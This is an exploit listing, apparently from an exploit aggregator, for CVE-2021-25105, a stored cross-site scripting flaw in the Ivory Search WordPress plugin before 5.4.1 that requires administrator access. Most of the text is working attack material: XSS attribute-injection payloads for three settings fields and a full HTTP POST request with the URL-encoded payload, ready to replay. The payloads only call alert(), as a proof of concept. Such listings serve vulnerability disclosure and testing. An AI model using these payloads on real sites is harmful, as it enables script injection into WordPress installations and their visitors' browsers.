Exploit for Ivory Search < 5.4.1 - Multiple Admin+ Stored Cross-Site Scripting CVE-2021-25105

Name: Exploit for Ivory Search < 5.4.1 - Multiple Admin+ Stored Cross-Site Scripting CVE-2021-25105
Rating: 5 (236 reviews)

2022-01-10 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:A9AB9E84-7F5E-4E7C-8647-114D9E02E59F
Go to the AJAX settings of a Form and put the following payload in the "Minimum number of characters required to run ajax search." (min_no_for_search field) or "Text when there is no search results" (nothing_found_text field) settings: "style=animation-name:rotation onanimationstart=alert(/XSS/)// yo="

Note: The min_no_for_search field is only validated to be a number client side.


For the _is_settings[highlight_color] parameter, a payload such as  " autofocus=autofocus onfocus=alert(/XSS/)// oni=" can be used

POST /wp-admin/admin.php?page=ivory-search&post=14&tab=options HTTP/2
Cookie: [admin cookies]
Content-Type: application/x-www-form-urlencoded

_wpnonce=e29855f021&post_ID=14&is_locale=&action=save&tab=options&_is_settings%5Bposts_per_page%5D=10&_is_settings%5Bhighlight_terms%5D=1&_is_settings%5Bhighlight_color%5D=%23FFFFB%22+autofocus%3Dautofocus+onfocus%3Dalert%28/XSS/%29%2F%2F+oni%3D%22&_is_settings%5Bterm_rel%5D=OR&_is_settings%5Bfuzzy_match%5D=2&_is_settings%5Bsearch_engine%5D=index&_is_settings%5Bmove_sticky_posts%5D=1&_is_settings%5Bdemo%5D=1&_is_settings%5Bdisable%5D=1&_is_settings%5Bempty_search%5D=1&is_save=Save+Form